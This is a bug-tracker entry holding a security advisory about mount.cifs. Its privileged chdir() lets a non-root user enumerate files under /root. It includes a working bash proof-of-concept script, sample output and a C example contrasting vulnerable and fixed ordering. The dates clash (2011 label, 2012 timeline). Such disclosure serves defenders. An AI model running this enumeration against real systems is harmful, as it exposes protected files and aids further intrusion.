Created attachment 7363
advisory

For example, /root/secretfile can be identified, because any user can control the privileged chdir() and infer the response. The chdir() maybe should be launched after the fstab check, and only over fstab directories.

########## Blueliv Advisory 2011-002 ##########
- Discovered by: Jesus Olmos Gonzalez
- Risk: 5/5
- Impact: 1/5
###############################################

1. VULNERABILITY
-------------------------
linux arbitrary privileged chdir(); this leads to arbitrary file identification as root.

2. BACKGROUND
-------------------------
mount.cifs (GNU Software) is part of the linux base system, and is setuid on most of the distributions. This software mounts cifs partitions to directories authorized by fstab.

3. DESCRIPTION
-------------------------
Although there are no authorized cifs mounts, it is possible through the second parameter to control a privileged chdir() syscall and infer the return value through the responses. This implies a little security breach of linux permissions. A non-root user can enumerate files and directories as root. This can help to exploit other vulnerabilities, enumerate /root/ contents, descriptors used by any process, user homes, etc ...

One of the attack vectors is a /root/ directory scan:

[sha0@spinlock advs]$ ./root_eye.sh wordlist /root/
--- directories ---
.pulse1
.bash_history
.alsaplayer
.dbus
.mozilla
.VirtualBox
.vim
.links
.config
.cpan
.gnome2
--- files ---
.pulse-cookie
.keystore
.bash_profile
dead.letter
.mysql_history
.Xauthority
.vimrc
.viminfo
secret

It also lets one enumerate sub-sub directories in order to dump readable files.

4. PROOF OF CONCEPT
-------------------------
#!/bin/bash
# root enumerator 0day by jesus.olmos@blueliv.com
# discover root protected files & directories, user homes, process descriptors, ...

wordlist=$1
path=$2

# Try each candidate name as the mount point. Nothing is ever mounted (there is
# no authorized fstab entry), but the error message from the privileged chdir()
# leaks whether the path is a directory ("denied") or a file ("not a directory").
while read -r i; do
    echo -n "$i:"
    /sbin/mount.cifs //127.0.0.1/a "$path/$i"
done < "$wordlist" 2>"log.$$" 1>&2

echo --- directories ---
grep 'denied' "log.$$" | cut -d ':' -f 1

echo --- files ---
grep -i 'not a directory' "log.$$" | cut -d ':' -f 1

rm "log.$$"

5. BUSINESS IMPACT
-------------------------
The confidentiality can be breached. This method of transferring files is highly dangerous and can rely on remote control of the server.

6. SYSTEMS AFFECTED
-------------------------
all versions are affected

7. SOLUTION
-------------------------
The chdir() should be done after the fstab check.

8. REFERENCES
-------------------------
http://gnu.org

9. CREDITS
-------------------------
Jesus Olmos Gonzalez jolmos(at)blueliv(dot)com
Blueliv SL

10. DISCLOSURE TIMELINE
-------------------------
February 20, 2012: Vulnerability discovered
March 07, 2012: Reported to the vendor

11. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.
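The ordering problem from sections 3 and 7, as an added illustration that is not the advisory's code nor mount.cifs's own: a privileged helper that chdir()s to the caller-supplied mount point before validating it turns the kernel's errno into an existence-and-type oracle, while checking a (here constructed) fstab allow-list first gives every unlisted path one uniform answer. The enum, function names and the allow-list are assumptions made for this example.

```c
/* Added example, not mount.cifs code: errno as an oracle vs. fstab check first. */
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>

enum probe { PROBE_OK, PROBE_DENIED, PROBE_NOT_DIR, PROBE_NO_ENTRY,
             PROBE_OTHER, PROBE_NOT_IN_FSTAB };

/* chdir() to path, then restore the previous cwd; returns 0 or the errno. */
static int try_chdir(const char *path)
{
    int saved = open(".", O_RDONLY);   /* keep the caller's cwd intact */
    int err = 0;
    if (chdir(path) != 0)
        err = errno;
    if (saved >= 0) {
        if (fchdir(saved) != 0 && err == 0)
            err = errno;
        close(saved);
    }
    return err;
}

/* Vulnerable ordering: chdir() as root first, a distinct message per errno.
 * These are the two messages the PoC script greps to tell dirs from files. */
enum probe probe_vulnerable(const char *mountpoint)
{
    switch (try_chdir(mountpoint)) {
    case 0:       return PROBE_OK;
    case EACCES:  return PROBE_DENIED;    /* "Permission denied" -> directory */
    case ENOTDIR: return PROBE_NOT_DIR;   /* "Not a directory"   -> file */
    case ENOENT:  return PROBE_NO_ENTRY;  /* "No such file or directory" */
    default:      return PROBE_OTHER;
    }
}

/* Fixed ordering: consult the allow-list (a constructed stand-in for the
 * fstab entries this caller may mount) before any syscall touches the path.
 * An unlisted path never reaches chdir(), so nothing about it is revealed. */
enum probe probe_hardened(const char *mountpoint,
                          const char *const *fstab_dirs, size_t n)
{
    size_t i;
    for (i = 0; i < n; i++)
        if (strcmp(mountpoint, fstab_dirs[i]) == 0)
            return probe_vulnerable(mountpoint); /* listed: chdir is legitimate */
    return PROBE_NOT_IN_FSTAB;
}
```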
*** This bug has been marked as a duplicate of bug 8821 ***